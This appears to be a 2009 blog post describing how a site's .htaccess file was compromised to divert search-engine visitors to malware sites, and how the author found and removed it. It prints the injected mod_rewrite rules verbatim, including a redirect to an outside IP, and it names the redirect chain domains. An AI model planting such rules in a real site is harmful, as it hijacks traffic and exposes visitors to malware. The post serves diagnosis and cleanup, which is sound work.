Gnarly Malware – Hijacks Website .htaccess and Steals Search Engine Traffic
Posted by Hodge on Jan 14, 2009 in Security, Web Development • 1 comment •
A friend in the US called me a few days ago, asking me to take a look at his website, calypsoislandtours.com, since his site traffic had dropped dramatically, for no obvious reason. Upon further investigation, he discovered that only search engine traffic was affected, which, as with many if not most websites, happened to be a major proportion of his inbound traffic – not particularly good for his business.
I searched Google for his site, and sure enough, clicking on one of the results redirected my browser to a rather dodgy website that clearly wasn’t calypsoislandtours.com. So, I investigated further, and found that somehow, the .htaccess file on his server had been altered, to contain the following lines:
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://89.28.13.201/in.html?s=xi [R,L]
Which was also preceded by a couple of dozen lines of white space, so that to most users checking .htaccess, the code would be “hidden” below the viewable window of an average text editor (I used the Linux command more, via ssh to check the file).
Basically, this nasty little piece of code utilises mod_rewrite to tell Apache to look for any traffic coming to the server from Google, AOL, MSN, Altavista, Ask or Yahoo (all the big search engines), and then to redirect that traffic to a server with the IP 89.28.13.201 (in a second .htaccess file, the IP was 89.28.13.205).
Using a combination of traceroute and Lynx web browser, I tracked the redirects. The web server located at 89.28.13.201 installs a cookie (visited=1) and also contains a script to redirect to a string of sitesĀ – first to worldgreenpeace.cn (link to Google Safe Browsing Info Page), which installs a cookie: soft=1. This site then redirects the browser to the final target destination of bestantivirusfastscan.com (link to Google Safe Browsing Info page) which installs a cookie: av_inst=880147 (arbitrary ID number – although it seems that 880147 people may have been redirected already). This final site contains Malware, which I presume does something nasty, although I felt no inclination to investigate further!
Thankfully, it was easy to cure – I simply deleted the above lines from .htaccess, and the website was instantly be back to normal, receiving the search engine traffic it should.
So, if you’re noticing a massive drop in search engine traffic to your site for no apparent reason, check the .htaccess first!
Something not quite right? Inaccuracies or invalid code? Didn’t work for you? Don’t like me using Ss instead of Zs? Add a comment below! All comments are welcome. Except spam, because spam is a bit crap.
|
|
Lof of 25 DELL CORE 2 DUO LAPTOP XP COMPUTER NOTEBOOK 1 $6,974.97 |
|
|
LOT OF 20 DELL INSPIRON LAPTOP NOTEBOOK COMPUTER $5,918.00 |
|
|
Lot 6 New HP G60 15.6 Laptop Notebook Win 7 HDMI Webcam $3,149.95 |
|
|
Lof of 10 DELL CORE 2 DUO LAPTOP XP COMPUTER NOTEBOOK 1 $2,819.97 |
|
|
NEW HP ENVY 17 Laptop Core i7 EXTREME i7-920XM Notebook $2,699.00 |
No related posts.
Related posts brought to you by Yet Another Related Posts Plugin.
[...] http://www.64bitjungle.com/web-development/gnarly-malware-hijacks-website-htaccess-and-steals-search…/ [...]